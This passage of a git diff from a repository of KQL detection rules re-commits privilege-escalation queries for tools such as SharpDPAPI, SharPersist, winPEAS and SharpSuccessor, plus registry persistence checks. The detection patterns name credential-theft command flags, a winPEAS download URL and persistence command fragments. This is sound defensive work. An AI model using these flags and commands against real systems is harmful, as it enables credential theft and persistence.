Escalation/hacktool_sharpdpapi_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql @@ -1,11 +1,11 @@ -// Title: HackTool - SharpDPAPI Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-06-26 -// Level: high -// Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. -// SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 - -DeviceProcessEvents +// Title: HackTool - SharpDPAPI Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-26 +// Level: high +// Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. +// SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 + +DeviceProcessEvents | where (FolderPath endswith "\\SharpDPAPI.exe" or ProcessVersionInfoOriginalFileName =~ "SharpDPAPI.exe") or ((ProcessCommandLine contains " backupkey " or ProcessCommandLine contains " blob " or ProcessCommandLine contains " certificates " or ProcessCommandLine contains " credentials " or ProcessCommandLine contains " keepass " or ProcessCommandLine contains " masterkeys " or ProcessCommandLine contains " rdg " or ProcessCommandLine contains " vaults ") and ((ProcessCommandLine contains " /file:" or ProcessCommandLine contains " /machine" or ProcessCommandLine contains " /mkfile:" or ProcessCommandLine contains " /password:" or ProcessCommandLine contains " /pvk:" or ProcessCommandLine contains " /server:" or ProcessCommandLine contains " /target:" or ProcessCommandLine contains " /unprotect") or (ProcessCommandLine contains " {" and ProcessCommandLine contains "}:"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql index b8e07a5b..a67a7260 100644 --- a/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharPersist Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-09-15 -// Level: high -// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053 - -DeviceProcessEvents +// Title: HackTool - SharPersist Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-15 +// Level: high +// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053 + +DeviceProcessEvents | where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql index f027e1ea..3446ac0f 100644 --- a/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharpImpersonation Execution -// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-27 -// Level: high -// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 - -DeviceProcessEvents +// Title: HackTool - SharpImpersonation Execution +// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-27 +// Level: high +// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql b/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql index 76348962..1475f038 100644 --- a/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - winPEAS Execution -// Author: Georg Lauenstein (sure[secure]) -// Date: 2022-09-19 -// Level: high -// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.discovery, attack.t1082, attack.t1087, attack.t1046 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - winPEAS Execution +// Author: Georg Lauenstein (sure[secure]) +// Date: 2022-09-19 +// Level: high +// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.t1082, attack.t1087, attack.t1046 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith "\\winPEASx86.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql index ae3193f5..0f9efe77 100644 --- a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql +++ b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql @@ -1,11 +1,11 @@ -// Title: HKTL - SharpSuccessor Privilege Escalation Tool Execution -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-06-06 -// Level: high -// Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments. -// Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068 - -DeviceProcessEvents +// Title: HKTL - SharpSuccessor Privilege Escalation Tool Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-06 +// Level: high +// Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments. +// Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068 + +DeviceProcessEvents | where FolderPath endswith "\\SharpSuccessor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpSuccessor.exe" or ProcessCommandLine contains "SharpSuccessor" or (ProcessCommandLine contains " add " and ProcessCommandLine contains " /impersonate" and ProcessCommandLine contains " /path" and ProcessCommandLine contains " /account" and ProcessCommandLine contains " /name") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql index 4b4f7048..9a64e30d 100644 --- a/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql @@ -1,13 +1,13 @@ -// Title: Internet Explorer Autorun Keys Modification -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019-10-25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason -// - Legitimate administrator sets up autorun keys for legitimate reason - -DeviceRegistryEvents +// Title: Internet Explorer Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents | where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql b/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql index 52bc1612..20fbc935 100644 --- a/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql +++ b/KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql @@ -1,12 +1,12 @@ -// Title: Launch Agent/Daemon Execution Via Launchctl -// Author: Pratinav Chandra -// Date: 2024-05-13 -// Level: medium -// Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1569.001, attack.t1543.001, attack.t1543.004 -// False Positives: -// - Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious. - -DeviceProcessEvents +// Title: Launch Agent/Daemon Execution Via Launchctl +// Author: Pratinav Chandra +// Date: 2024-05-13 +// Level: medium +// Description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1569.001, attack.t1543.001, attack.t1543.004 +// False Positives: +// - Legitimate administration activities is expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent are suspicious. + +DeviceProcessEvents | where (ProcessCommandLine contains "submit" or ProcessCommandLine contains "load" or ProcessCommandLine contains "start") and FolderPath endswith "/launchctl" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql index db20864f..b199634d 100644 --- a/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql +++ b/KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql @@ -1,15 +1,15 @@ -// Title: Linux Sudo Chroot Execution -// Author: Swachchhanda Shrawn Poudel (Nextron Systems) -// Date: 2025-10-02 -// Level: low -// Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. -// Attackers may use this technique to evade detection and execute commands in a modified environment. -// This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. -// While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068 -// False Positives: -// - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management. - -DeviceProcessEvents +// Title: Linux Sudo Chroot Execution +// Author: Swachchhanda Shrawn Poudel (Nextron Systems) +// Date: 2025-10-02 +// Level: low +// Description: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. +// Attackers may use this technique to evade detection and execute commands in a modified environment. +// This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. +// While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068 +// False Positives: +// - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management. + +DeviceProcessEvents | where (ProcessCommandLine contains " --chroot " or ProcessCommandLine contains "sudo -R ") and FolderPath endswith "/sudo" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql b/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql index f5b3a770..79d3d137 100644 --- a/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql +++ b/KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql @@ -1,10 +1,10 @@ -// Title: Microsoft Sync Center Suspicious Network Connections -// Author: elhoim -// Date: 2022-04-28 -// Level: medium -// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion - -DeviceNetworkEvents +// Title: Microsoft Sync Center Suspicious Network Connections +// Author: elhoim +// Date: 2022-04-28 +// Level: medium +// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql b/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql index d521f26a..1b8071db 100644 --- a/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql +++ b/KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql @@ -1,10 +1,10 @@ -// Title: Narrator's Feedback-Hub Persistence -// Author: Dmitriy Lifanov, oscd.community -// Date: 2019-10-25 -// Level: high -// Description: Detects abusing Windows 10 Narrator's Feedback-Hub -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 - -DeviceRegistryEvents +// Title: Narrator's Feedback-Hub Persistence +// Author: Dmitriy Lifanov, oscd.community +// Date: 2019-10-25 +// Level: high +// Description: Detects abusing Windows 10 Narrator's Feedback-Hub +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents | where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql index c926c9a4..60cad49f 100644 --- a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql +++ b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql @@ -1,14 +1,14 @@ -// Title: Network Connection Initiated Via Notepad.EXE -// Author: EagleEye Team -// Date: 2020-05-14 -// Level: high -// Description: Detects a network connection that is initiated by the "notepad.exe" process. -// This might be a sign of process injection from a beacon process or something similar. -// Notepad rarely initiates a network communication except when printing documents for example. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055 -// False Positives: -// - Printing documents via notepad might cause communication with the printer via port 9100 or similar. - -DeviceNetworkEvents +// Title: Network Connection Initiated Via Notepad.EXE +// Author: EagleEye Team +// Date: 2020-05-14 +// Level: high +// Description: Detects a network connection that is initiated by the "notepad.exe" process. +// This might be a sign of process injection from a beacon process or something similar. +// Notepad rarely initiates a network communication except when printing documents for example. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055 +// False Positives: +// - Printing documents via notepad might cause communication with the printer via port 9100 or similar. + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100)) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql b/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql index adca6786..91e403ac 100644 --- a/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql +++ b/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql @@ -1,12 +1,12 @@ -// Title: New ActiveScriptEventConsumer Created Via Wmic.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2021-06-25 -// Level: high -// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003 -// False Positives: -// - Legitimate software creating script event consumers - -DeviceProcessEvents +// Title: New ActiveScriptEventConsumer Created Via Wmic.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-25 +// Level: high +// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003 +// False Positives: +// - Legitimate software creating script event consumers + +DeviceProcessEvents | where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE " \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql index ea14e885..b6c4d886 100644 --- a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql +++ b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql @@ -1,13 +1,13 @@ -// Title: New Custom Shim Database Created -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-29 -// Level: medium -// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. -// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 -// False Positives: -// - Legitimate custom SHIM installations will also trigger this rule - -DeviceFileEvents +// Title: New Custom Shim Database Created +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-29 +// Level: medium +// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. +// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 +// False Positives: +// - Legitimate custom SHIM installations will also trigger this rule + +DeviceFileEvents | where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql index 307db5e0..f3678c83 100644 --- a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql +++ b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql @@ -1,10 +1,10 @@ -// Title: New DNS ServerLevelPluginDll Installed -// Author: Florian Roth (Nextron Systems) -// Date: 2017-05-08 -// Level: high -// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 - -DeviceRegistryEvents +// Title: New DNS ServerLevelPluginDll Installed +// Author: Florian Roth (Nextron Systems) +// Date: 2017-05-08 +// Level: high +// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 + +DeviceRegistryEvents | where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql index bec45db7..b304067c 100644 --- a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql +++ b/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql @@ -1,10 +1,10 @@ -// Title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2017-05-08 -// Level: high -// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 - -DeviceProcessEvents +// Title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2017-05-08 +// Level: high +// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112 + +DeviceProcessEvents | where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql index 337e8c14..e4204067 100644 --- a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql +++ b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql @@ -1,10 +1,10 @@ -// Title: New Netsh Helper DLL Registered From A Suspicious Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-11-28 -// Level: high -// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 - -DeviceRegistryEvents +// Title: New Netsh Helper DLL Registered From A Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-28 +// Level: high +// Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 + +DeviceRegistryEvents | where RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql b/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql index 022ba935..7c153c5a 100644 --- a/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql +++ b/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql @@ -1,12 +1,12 @@ -// Title: New Outlook Macro Created -// Author: @ScoubiMtl -// Date: 2021-04-05 -// Level: medium -// Description: Detects the creation of a macro file for Outlook. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 -// False Positives: -// - User genuinely creates a VB Macro for their email - -DeviceFileEvents +// Title: New Outlook Macro Created +// Author: @ScoubiMtl +// Date: 2021-04-05 +// Level: medium +// Description: Detects the creation of a macro file for Outlook. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 +// False Positives: +// - User genuinely creates a VB Macro for their email + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql b/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql index 0dabaaa0..5e36cf0c 100644 --- a/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql +++ b/KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql @@ -1,12 +1,12 @@ -// Title: New RUN Key Pointing to Suspicious Folder -// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2018-08-25 -// Level: high -// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Software using weird folders for updates - -DeviceRegistryEvents +// Title: New RUN Key Pointing to Suspicious Folder +// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2018-08-25 +// Level: high +// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Software using weird folders for updates + +DeviceRegistryEvents | where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and ((RegistryValueData contains ":\\Perflogs" or RegistryValueData contains ":\\ProgramData'" or RegistryValueData contains ":\\Windows\\Temp" or RegistryValueData contains ":\\Temp" or RegistryValueData contains "\\AppData\\Local\\Temp" or RegistryValueData contains "\\AppData\\Roaming" or RegistryValueData contains ":\\$Recycle.bin" or RegistryValueData contains ":\\Users\\Default" or RegistryValueData contains ":\\Users\\public" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "%Public%" or RegistryValueData contains "%AppData%") or (RegistryValueData contains ":\\Users\\" and (RegistryValueData contains "\\Favorites" or RegistryValueData contains "\\Favourites" or RegistryValueData contains 